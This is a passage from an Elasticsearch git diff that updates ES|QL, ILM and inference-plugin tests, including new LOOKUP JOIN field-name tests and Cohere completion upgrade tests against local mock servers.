equalTo(Set.of("remote2"))); } @@ -495,14 +495,16 @@ public void testDetermineUnavailableRemoteClusters() { { List failures = new ArrayList<>(); failures.add(new FieldCapabilitiesFailure(new String[] { "remote1:mylogs1" }, new RuntimeException("foo"))); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + var groupedFailures = EsqlCCSUtils.groupFailuresPerCluster(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(groupedFailures); assertThat(unavailableClusters.keySet(), equalTo(Set.of())); } // empty failures list { List failures = new ArrayList<>(); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + var groupedFailures = EsqlCCSUtils.groupFailuresPerCluster(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(groupedFailures); assertThat(unavailableClusters.keySet(), equalTo(Set.of())); } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/IndexResolverFieldNamesTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/IndexResolverFieldNamesTests.java index 4264fdacc5d7b..619f94dba4914 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/IndexResolverFieldNamesTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/IndexResolverFieldNamesTests.java @@ -9,6 +9,7 @@ import org.elasticsearch.Build; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.action.EsqlCapabilities; import org.elasticsearch.xpack.esql.parser.EsqlParser; import org.elasticsearch.xpack.esql.parser.ParsingException; @@ -1600,7 +1601,7 @@ public void testEnrichOnDefaultField() { public void testMetrics() { var query = "TS k8s | STATS bytes=sum(rate(network.total_bytes_in)), sum(rate(network.total_cost)) BY cluster"; if (Build.current().isSnapshot() == false) { - var e = expectThrows(ParsingException.class, () -> parser.createStatement(query)); + var e = expectThrows(ParsingException.class, () -> parser.createStatement(query, EsqlTestUtils.TEST_CFG)); assertThat(e.getMessage(), containsString("line 1:1: mismatched input 'TS' expecting {")); return; } @@ -1969,7 +1970,7 @@ public void testDropAgainWithWildcardAfterEval() { """, Set.of("emp_no", "emp_no.*", "*name", "*name.*")); } - public void testDropWildcardedFields_AfterRename() { + public void testDropWildcardFieldsAfterRename() { assertFieldNames( """ from employees @@ -1982,7 +1983,30 @@ public void testDropWildcardedFields_AfterRename() { ); } - public void testDropWildcardFields_WithLookupJoin() { + public void testDropWildcardFieldsAfterLookupJoins() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames(""" + FROM sample_data + | EVAL client_ip = client_ip::keyword + | LOOKUP JOIN clientips_lookup ON client_ip + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e""", Set.of("*"), Set.of()); + } + + public void testDropWildcardFieldsAfterLookupJoins2() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames(""" + FROM sample_data + | EVAL client_ip = client_ip::keyword + | LOOKUP JOIN clientips_lookup ON client_ip + | DROP *e, client_ip + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e""", Set.of("*"), Set.of()); + } + + public void testDropWildcardFieldsAfterLookupJoinsAndKeep() { assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); assertFieldNames( """ @@ -1998,6 +2022,55 @@ public void testDropWildcardFields_WithLookupJoin() { ); } + public void testDropWildcardFieldsAfterLookupJoinKeepLookupJoin() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames( + """ + FROM sample_data + | EVAL client_ip = client_ip::keyword + | LOOKUP JOIN clientips_lookup ON client_ip + | KEEP @timestamp, *e*, client_ip + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e""", + Set.of("client_ip", "client_ip.*", "message", "message.*", "@timestamp", "@timestamp.*", "*e*", "*e", "*e.*"), + Set.of("message_types_lookup") + ); + } + + public void testDropWildcardFieldsAfterKeepAndLookupJoins() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames( + """ + FROM sample_data + | EVAL client_ip = client_ip::keyword + | KEEP @timestamp, *e*, client_ip + | LOOKUP JOIN clientips_lookup ON client_ip + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e""", + Set.of("client_ip", "client_ip.*", "message", "message.*", "@timestamp", "@timestamp.*", "*e*", "*e", "*e.*"), + Set.of("clientips_lookup", "message_types_lookup") + ); + } + + public void testDropWildcardFieldsAfterKeepAndLookupJoins2() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames( + """ + FROM sample_data + | EVAL client_ip = client_ip::keyword + | KEEP @timestamp, *e*, client_ip + | LOOKUP JOIN clientips_lookup ON client_ip + | DROP *e + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e, client_ip""", + Set.of("client_ip", "client_ip.*", "message", "message.*", "@timestamp", "@timestamp.*", "*e*", "*e", "*e.*"), + Set.of("clientips_lookup", "message_types_lookup") + ); + } + public void testForkFieldsWithKeepAfterFork() { assertFieldNames(""" FROM test @@ -2076,7 +2149,8 @@ public void testForkWithStatsAndWhere() { private Set fieldNames(String query, Set enrichPolicyMatchFields) { var preAnalysisResult = new EsqlSession.PreAnalysisResult(null); - return EsqlSession.fieldNames(parser.createStatement(query), enrichPolicyMatchFields, preAnalysisResult).fieldNames(); + return EsqlSession.fieldNames(parser.createStatement(query, EsqlTestUtils.TEST_CFG), enrichPolicyMatchFields, preAnalysisResult) + .fieldNames(); } private void assertFieldNames(String query, Set expected) { @@ -2085,7 +2159,11 @@ private void assertFieldNames(String query, Set expected) { } private void assertFieldNames(String query, Set expected, Set wildCardIndices) { - var preAnalysisResult = EsqlSession.fieldNames(parser.createStatement(query), Set.of(), new EsqlSession.PreAnalysisResult(null)); + var preAnalysisResult = EsqlSession.fieldNames( + parser.createStatement(query, EsqlTestUtils.TEST_CFG), + Set.of(), + new EsqlSession.PreAnalysisResult(null) + ); assertThat("Query-wide field names", preAnalysisResult.fieldNames(), equalTo(expected)); assertThat("Lookup Indices that expect wildcard lookups", preAnalysisResult.wildcardJoinIndices(), equalTo(wildCardIndices)); } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/telemetry/VerifierMetricsTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/telemetry/VerifierMetricsTests.java index 0fee82f4f6ee7..1f3047262c94d 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/telemetry/VerifierMetricsTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/telemetry/VerifierMetricsTests.java @@ -10,6 +10,7 @@ import org.elasticsearch.license.XPackLicenseState; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.xpack.core.watcher.common.stats.Counters; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.analysis.Verifier; import org.elasticsearch.xpack.esql.expression.function.EsqlFunctionRegistry; import org.elasticsearch.xpack.esql.expression.function.FunctionDefinition; @@ -554,7 +555,7 @@ private Counters esql(String esql, Verifier v) { metrics = new Metrics(new EsqlFunctionRegistry()); verifier = new Verifier(metrics, new XPackLicenseState(() -> 0L)); } - analyzer(verifier).analyze(parser.createStatement(esql)); + analyzer(verifier).analyze(parser.createStatement(esql, EsqlTestUtils.TEST_CFG)); return metrics == null ? null : metrics.stats(); } diff --git a/x-pack/plugin/identity-provider/src/test/java/org/elasticsearch/xpack/idp/action/SamlInitiateSingleSignOnRequestTests.java b/x-pack/plugin/identity-provider/src/test/java/org/elasticsearch/xpack/idp/action/SamlInitiateSingleSignOnRequestTests.java index ee13dd28db4d2..6c280a2bd2a52 100644 --- a/x-pack/plugin/identity-provider/src/test/java/org/elasticsearch/xpack/idp/action/SamlInitiateSingleSignOnRequestTests.java +++ b/x-pack/plugin/identity-provider/src/test/java/org/elasticsearch/xpack/idp/action/SamlInitiateSingleSignOnRequestTests.java @@ -112,7 +112,7 @@ public void testSerializationOldTransportVersion() throws Exception { out.setTransportVersion( TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion(TransportVersions.IDP_CUSTOM_SAML_ATTRIBUTES_ADDED_8_19) ) ); diff --git a/x-pack/plugin/ilm/src/main/java/org/elasticsearch/xpack/ilm/action/TransportRetryAction.java b/x-pack/plugin/ilm/src/main/java/org/elasticsearch/xpack/ilm/action/TransportRetryAction.java index 5c3200c873877..2583a80a3cfb6 100644 --- a/x-pack/plugin/ilm/src/main/java/org/elasticsearch/xpack/ilm/action/TransportRetryAction.java +++ b/x-pack/plugin/ilm/src/main/java/org/elasticsearch/xpack/ilm/action/TransportRetryAction.java @@ -80,7 +80,7 @@ protected void masterOperation( submitUnbatchedTask("ilm-re-run", new AckedClusterStateUpdateTask(request, listener) { @Override public ClusterState execute(ClusterState currentState) { - final var project = state.metadata().getProject(projectState.projectId()); + final var project = currentState.metadata().getProject(projectState.projectId()); final var updatedProject = indexLifecycleService.moveIndicesToPreviouslyFailedStep(project, request.indices()); return ClusterState.builder(currentState).putProjectMetadata(updatedProject).build(); } diff --git a/x-pack/plugin/ilm/src/test/java/org/elasticsearch/xpack/ilm/IndexLifecycleRunnerTests.java b/x-pack/plugin/ilm/src/test/java/org/elasticsearch/xpack/ilm/IndexLifecycleRunnerTests.java index 2db166a91cbbe..13c001ce4e499 100644 --- a/x-pack/plugin/ilm/src/test/java/org/elasticsearch/xpack/ilm/IndexLifecycleRunnerTests.java +++ b/x-pack/plugin/ilm/src/test/java/org/elasticsearch/xpack/ilm/IndexLifecycleRunnerTests.java @@ -488,7 +488,6 @@ public void doTestRunPolicyWithFailureToReadPolicy(boolean asyncAction, boolean // The cluster state can take a few extra milliseconds to update after the steps are executed ClusterServiceUtils.awaitClusterState( - logger, s -> s.metadata().getProject(state.projectId()).index(indexMetadata.getIndex()).getLifecycleExecutionState().stepInfo() != null, clusterService ); diff --git a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/CreateFromDeploymentIT.java b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/CreateFromDeploymentIT.java index 5571729626fb9..3882aa5426e38 100644 --- a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/CreateFromDeploymentIT.java +++ b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/CreateFromDeploymentIT.java @@ -51,7 +51,7 @@ public void testAttachToDeployment() throws IOException { var results = infer(inferenceId, List.of("washing machine")); assertNotNull(results.get("sparse_embedding")); - var updatedNumAllocations = randomIntBetween(1, 10); + var updatedNumAllocations = randomIntBetween(1, 2); var updatedEndpointConfig = updateEndpoint(inferenceId, updatedEndpointConfig(updatedNumAllocations), TaskType.SPARSE_EMBEDDING); assertThat( updatedEndpointConfig.get("service_settings"), @@ -128,7 +128,7 @@ public void testAttachWithModelId() throws IOException { var results = infer(inferenceId, List.of("washing machine")); assertNotNull(results.get("sparse_embedding")); - var updatedNumAllocations = randomIntBetween(1, 10); + var updatedNumAllocations = randomIntBetween(1, 2); var updatedEndpointConfig = updateEndpoint(inferenceId, updatedEndpointConfig(updatedNumAllocations), TaskType.SPARSE_EMBEDDING); assertThat( updatedEndpointConfig.get("service_settings"), diff --git a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetModelsWithElasticInferenceServiceIT.java b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetModelsWithElasticInferenceServiceIT.java index e548fcc4f2eb1..e9ba9923fdcf8 100644 --- a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetModelsWithElasticInferenceServiceIT.java +++ b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetModelsWithElasticInferenceServiceIT.java @@ -41,7 +41,7 @@ public void testGetDefaultEndpoints() throws IOException { } assertInferenceIdTaskType(allModels, ".rainbow-sprinkles-elastic", TaskType.CHAT_COMPLETION); - assertInferenceIdTaskType(allModels, ".elser-v2-elastic", TaskType.SPARSE_EMBEDDING); + assertInferenceIdTaskType(allModels, ".elser-2-elastic", TaskType.SPARSE_EMBEDDING); assertInferenceIdTaskType(allModels, ".multilingual-embed-v1-elastic", TaskType.TEXT_EMBEDDING); assertInferenceIdTaskType(allModels, ".rerank-v1-elastic", TaskType.RERANK); } diff --git a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetServicesIT.java b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetServicesIT.java index b96c94db438a7..9bea31fcdcec2 100644 --- a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetServicesIT.java +++ b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetServicesIT.java @@ -20,7 +20,6 @@ import static org.elasticsearch.xpack.inference.InferenceBaseRestTest.assertStatusOkOrCreated; import static org.hamcrest.Matchers.containsInAnyOrder; -import static org.hamcrest.Matchers.equalTo; public class InferenceGetServicesIT extends BaseMockEISAuthServerTest { @@ -41,7 +40,6 @@ public void testGetServicesWithoutTaskType() throws IOException { "azureaistudio", "azureopenai", "cohere", - "custom", "deepseek", "elastic", "elasticsearch", @@ -77,9 +75,6 @@ private Iterable providers(List services) { } public void testGetServicesWithTextEmbeddingTaskType() throws IOException { - List services = getServices(TaskType.TEXT_EMBEDDING); - assertThat(services.size(), equalTo(18)); - assertThat( providersFor(TaskType.TEXT_EMBEDDING), containsInAnyOrder( @@ -90,7 +85,6 @@ public void testGetServicesWithTextEmbeddingTaskType() throws IOException { "azureaistudio", "azureopenai", "cohere", - "custom", "elastic", "elasticsearch", "googleaistudio", @@ -118,7 +112,6 @@ public void testGetServicesWithRerankTaskType() throws IOException { List.of( "alibabacloud-ai-search", "cohere", - "custom", "elasticsearch", "googlevertexai", "jinaai", @@ -143,7 +136,6 @@ public void testGetServicesWithCompletionTaskType() throws IOException { "azureaistudio", "azureopenai", "cohere", - "custom", "deepseek", "googleaistudio", "openai", @@ -181,7 +173,6 @@ public void testGetServicesWithSparseEmbeddingTaskType() throws IOException { containsInAnyOrder( List.of( "alibabacloud-ai-search", - "custom", "elastic", "elasticsearch", "hugging_face", diff --git a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/MockElasticInferenceServiceAuthorizationServer.java b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/MockElasticInferenceServiceAuthorizationServer.java index 7f0212167f8ac..4f6260dba7152 100644 --- a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/MockElasticInferenceServiceAuthorizationServer.java +++ b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/MockElasticInferenceServiceAuthorizationServer.java @@ -39,7 +39,7 @@ public void enqueueAuthorizeAllModelsResponse() { "task_types": ["chat"] }, { - "model_name": "elser-v2", + "model_name": "elser_model_2", "task_types": ["embed/text/sparse"] }, { diff --git a/x-pack/plugin/inference/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/xpack/application/CohereServiceUpgradeIT.java b/x-pack/plugin/inference/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/xpack/application/CohereServiceUpgradeIT.java index 9782d4881ac61..6191e83a7dca1 100644 --- a/x-pack/plugin/inference/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/xpack/application/CohereServiceUpgradeIT.java +++ b/x-pack/plugin/inference/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/xpack/application/CohereServiceUpgradeIT.java @@ -39,10 +39,12 @@ public class CohereServiceUpgradeIT extends InferenceUpgradeTestCase { // TODO: replace with proper test features private static final String COHERE_EMBEDDINGS_ADDED_TEST_FEATURE = "gte_v8.13.0"; private static final String COHERE_RERANK_ADDED_TEST_FEATURE = "gte_v8.14.0"; + private static final String COHERE_COMPLETIONS_ADDED_TEST_FEATURE = "gte_v8.15.0"; private static final String COHERE_V2_API_ADDED_TEST_FEATURE = "inference.cohere.v2"; private static MockWebServer cohereEmbeddingsServer; private static MockWebServer cohereRerankServer; + private static MockWebServer cohereCompletionsServer; private enum ApiVersion { V1, @@ -60,12 +62,16 @@ public static void startWebServer() throws IOException { cohereRerankServer = new MockWebServer(); cohereRerankServer.start(); + + cohereCompletionsServer = new MockWebServer(); + cohereCompletionsServer.start(); } @AfterClass public static void shutdown() { cohereEmbeddingsServer.close(); cohereRerankServer.close(); + cohereCompletionsServer.close(); } @SuppressWarnings("unchecked") @@ -326,6 +332,80 @@ private void assertRerank(String inferenceId) throws IOException { assertThat(inferenceMap.entrySet(), not(empty())); } + @SuppressWarnings("unchecked") + public void testCohereCompletions() throws IOException { + var completionsSupported = oldClusterHasFeature(COHERE_COMPLETIONS_ADDED_TEST_FEATURE); + assumeTrue("Cohere completions not supported", completionsSupported); + + ApiVersion oldClusterApiVersion = oldClusterHasFeature(COHERE_V2_API_ADDED_TEST_FEATURE) ? ApiVersion.V2 : ApiVersion.V1; + + final String oldClusterId = "old-cluster-completions"; + + if (isOldCluster()) { + // queue a response as PUT will call the service + cohereCompletionsServer.enqueue(new MockResponse().setResponseCode(200).setBody(completionsResponse(oldClusterApiVersion))); + put(oldClusterId, completionsConfig(getUrl(cohereCompletionsServer)), TaskType.COMPLETION); + + var configs = (List>) get(TaskType.COMPLETION, oldClusterId).get("endpoints"); + assertThat(configs, hasSize(1)); + assertEquals("cohere", configs.get(0).get("service")); + var serviceSettings = (Map) configs.get(0).get("service_settings"); + assertThat(serviceSettings, hasEntry("model_id", "command")); + } else if (isMixedCluster()) { + var configs = (List>) get(TaskType.COMPLETION, oldClusterId).get("endpoints"); + assertThat(configs, hasSize(1)); + assertEquals("cohere", configs.get(0).get("service")); + var serviceSettings = (Map) configs.get(0).get("service_settings"); + assertThat(serviceSettings, hasEntry("model_id", "command")); + } else if (isUpgradedCluster()) { + // check old cluster model + var configs = (List>) get(TaskType.COMPLETION, oldClusterId).get("endpoints"); + var serviceSettings = (Map) configs.get(0).get("service_settings"); + assertThat(serviceSettings, hasEntry("model_id", "command")); + + final String newClusterId = "new-cluster-completions"; + { + cohereCompletionsServer.enqueue(new MockResponse().setResponseCode(200).setBody(completionsResponse(oldClusterApiVersion))); + var inferenceMap = inference(oldClusterId, TaskType.COMPLETION, "some text"); + assertThat(inferenceMap.entrySet(), not(empty())); + assertVersionInPath(cohereCompletionsServer.requests().getLast(), "chat", oldClusterApiVersion); + } + { + // new cluster uses the V2 API + cohereCompletionsServer.enqueue(new MockResponse().setResponseCode(200).setBody(completionsResponse(ApiVersion.V2))); + put(newClusterId, completionsConfig(getUrl(cohereCompletionsServer)), TaskType.COMPLETION); + + cohereCompletionsServer.enqueue(new MockResponse().setResponseCode(200).setBody(completionsResponse(ApiVersion.V2))); + var inferenceMap = inference(newClusterId, TaskType.COMPLETION, "some text"); + assertThat(inferenceMap.entrySet(), not(empty())); + assertVersionInPath(cohereCompletionsServer.requests().getLast(), "chat", ApiVersion.V2); + } + + { + // new endpoints use the V2 API which require the model to be set + final String upgradedClusterNoModel = "upgraded-cluster-missing-model-id"; + var jsonBody = Strings.format(""" + { + "service": "cohere", + "service_settings": { + "url": "%s", + "api_key": "XXXX" + } + } + """, getUrl(cohereEmbeddingsServer)); + + var e = expectThrows(ResponseException.class, () -> put(upgradedClusterNoModel, jsonBody, TaskType.COMPLETION)); + assertThat( + e.getMessage(), + containsString("Validation Failed: 1: The [service_settings.model_id] field is required for the Cohere V2 API.") + ); + } + + delete(oldClusterId); + delete(newClusterId); + } + } + private String embeddingConfigByte(String url) { return embeddingConfigTemplate(url, "byte"); } @@ -451,4 +531,86 @@ private String rerankResponse() { """; } + private String completionsConfig(String url) { + return Strings.format(""" + { + "service": "cohere", + "service_settings": { + "api_key": "XXXX", + "model_id": "command", + "url": "%s" + } + } + """, url); + } + + private String completionsResponse(ApiVersion version) { + return switch (version) { + case V1 -> v1CompletionsResponse(); + case V2 -> v2CompletionsResponse(); + }; + } + + private String v1CompletionsResponse() { + return """ + { + "response_id": "some id", + "text": "result", + "generation_id": "some id", + "chat_history": [ + { + "role": "USER", + "message": "some input" + }, + { + "role": "CHATBOT", + "message": "v1 response from the llm" + } + ], + "finish_reason": "COMPLETE", + "meta": { + "api_version": { + "version": "1" + }, + "billed_units": { + "input_tokens": 4, + "output_tokens": 191 + }, + "tokens": { + "input_tokens": 70, + "output_tokens": 191 + } + } + } + """; + } + + private String v2CompletionsResponse() { + return """ + { + "id": "c14c80c3-18eb-4519-9460-6c92edd8cfb4", + "finish_reason": "COMPLETE", + "message": { + "role": "assistant", + "content": [ + { + "type": "text", + "text": "v2 response from the LLM" + } + ] + }, + "usage": { + "billed_units": { + "input_tokens": 1, + "output_tokens": 2 + }, + "tokens": { + "input_tokens": 3, + "output_tokens": 4 + } + } + } + """; + } + } diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterBasicLicenseIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterBasicLicenseIT.java index e2d00b8c52781..33b9adb431a0a 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterBasicLicenseIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterBasicLicenseIT.java @@ -23,6 +23,7 @@ import org.elasticsearch.license.LicenseSettings; import org.elasticsearch.plugins.Plugin; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.xpack.core.XPackField; import org.elasticsearch.xpack.inference.LocalStateInferencePlugin; import org.elasticsearch.xpack.inference.Utils; @@ -42,6 +43,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.instanceOf; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class ShardBulkInferenceActionFilterBasicLicenseIT extends ESIntegTestCase { public static final String INDEX_NAME = "test-index"; diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterIT.java index 8405fba22460f..7ddbf4fc55ffd 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterIT.java @@ -32,6 +32,7 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.search.builder.SearchSourceBuilder; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalTestCluster; import org.elasticsearch.xpack.inference.InferenceIndex; import org.elasticsearch.xpack.inference.LocalStateInferencePlugin; @@ -56,6 +57,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class ShardBulkInferenceActionFilterIT extends ESIntegTestCase { public static final String INDEX_NAME = "test-index"; diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/InferenceRevokeDefaultEndpointsIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/InferenceRevokeDefaultEndpointsIT.java index 4c200c6f20247..14f780b19fa1e 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/InferenceRevokeDefaultEndpointsIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/InferenceRevokeDefaultEndpointsIT.java @@ -20,6 +20,7 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.reindex.ReindexPlugin; import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.http.MockResponse; import org.elasticsearch.test.http.MockWebServer; import org.elasticsearch.threadpool.ThreadPool; @@ -47,6 +48,7 @@ import static org.hamcrest.Matchers.containsInAnyOrder; import static org.mockito.Mockito.mock; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class InferenceRevokeDefaultEndpointsIT extends ESSingleNodeTestCase { private static final TimeValue TIMEOUT = new TimeValue(30, TimeUnit.SECONDS); @@ -193,7 +195,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA { "models": [ { - "model_name": "elser-v2", + "model_name": "elser_model_2", "task_types": ["embed/text/sparse"] }, { @@ -222,7 +224,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA service.defaultConfigIds(), containsInAnyOrder( new InferenceService.DefaultConfigId( - ".elser-v2-elastic", + ".elser-2-elastic", MinimalServiceSettings.sparseEmbedding(ElasticInferenceService.NAME), service ), @@ -255,7 +257,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA PlainActionFuture> listener = new PlainActionFuture<>(); service.defaultConfigs(listener); - assertThat(listener.actionGet(TIMEOUT).get(0).getConfigurations().getInferenceEntityId(), is(".elser-v2-elastic")); + assertThat(listener.actionGet(TIMEOUT).get(0).getConfigurations().getInferenceEntityId(), is(".elser-2-elastic")); assertThat( listener.actionGet(TIMEOUT).get(1).getConfigurations().getInferenceEntityId(), is(".multilingual-embed-v1-elastic") @@ -277,7 +279,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA { "models": [ { - "model_name": "elser-v2", + "model_name": "elser_model_2", "task_types": ["embed/text/sparse"] }, { @@ -302,7 +304,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA service.defaultConfigIds(), containsInAnyOrder( new InferenceService.DefaultConfigId( - ".elser-v2-elastic", + ".elser-2-elastic", MinimalServiceSettings.sparseEmbedding(ElasticInferenceService.NAME), service ), diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/ModelRegistryIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/ModelRegistryIT.java index e56782bd00ef5..3c09e73c55411 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/ModelRegistryIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/ModelRegistryIT.java @@ -34,6 +34,7 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.reindex.ReindexPlugin; import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.xcontent.ToXContentObject; import org.elasticsearch.xcontent.XContentBuilder; @@ -74,6 +75,7 @@ import static org.mockito.Mockito.doAnswer; import static org.mockito.Mockito.mock; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class ModelRegistryIT extends ESSingleNodeTestCase { private static final TimeValue TIMEOUT = new TimeValue(30, TimeUnit.SECONDS); diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexOptionsIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexOptionsIT.java new file mode 100644 index 0000000000000..7ee1db0a8eb80 --- /dev/null +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexOptionsIT.java @@ -0,0 +1,279 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.inference.integration; + +import org.elasticsearch.action.admin.indices.mapping.get.GetFieldMappingsAction; +import org.elasticsearch.action.admin.indices.mapping.get.GetFieldMappingsRequest; +import org.elasticsearch.action.support.IndicesOptions; +import org.elasticsearch.common.bytes.BytesReference; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.xcontent.XContentHelper; +import org.elasticsearch.core.Nullable; +import org.elasticsearch.core.TimeValue; +import org.elasticsearch.index.mapper.vectors.DenseVectorFieldMapper; +import org.elasticsearch.index.mapper.vectors.IndexOptions; +import org.elasticsearch.inference.TaskType; +import org.elasticsearch.license.GetLicenseAction; 